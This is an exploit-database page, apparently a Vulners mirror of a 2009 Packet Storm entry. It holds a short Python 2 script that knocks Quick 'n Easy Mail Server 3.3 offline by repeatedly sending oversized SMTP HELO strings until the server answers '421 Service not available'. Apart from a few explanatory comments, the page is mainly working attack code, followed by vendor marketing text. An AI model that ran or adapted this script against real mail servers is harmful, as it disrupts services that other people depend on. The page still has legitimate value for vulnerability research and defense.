Lucene search
+L

Quick N Easay Mail Server 3.3 Denial Of Service

🗓️ 05 May 2009 00:00:00Reported by shinnaiType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 19 Views

Quick 'n Easy Mail Server 3.3 remote denial of service due to buffer overflow vulnerabilit

Code
`# ---------------------------------------------------------------  
# Quick 'n Easy Mail Server 3.3 (Demo) Remote Denial of Service  
# http://www.pablosoftwaresolutions.com/  
  
# author: shinnai  
# mail: shinnai[at]autistici[dot]org  
# site: http://www.shinnai.net/  
  
# When you pass a long string to the server, it checks for bof  
# type attacks and answers with a:  
# "<SMTP> Buffer overflow: DOS attack?"  
# after 25 requests (more or less), server is unable to handle  
# errors.  
# An attacker can exploit this issue to trigger dos conditions.  
# In case of succesful exploitation of this vulnerability,  
# the server will answer to requests as below:  
# "<SMTP> 421 Service not available"  
#---------------------------------------------------------------"  
  
import socket  
  
try:  
for i in range(1,30):  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
conn = s.connect(("127.0.0.1",25))  
s.send('HELO ' + "[email protected]" * 4000 + '\r\n')  
d = s.recv(1024)  
print d  
s.close  
raw_input("Done. If server is still available, try to increase the number of requests.\n\nPress enter to quit...")  
except:  
raw_input("Unable to connect!\n\nPress enter to quit...")  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 May 2009 00:00Current
7.4High risk
Vulners AI Score7.4
19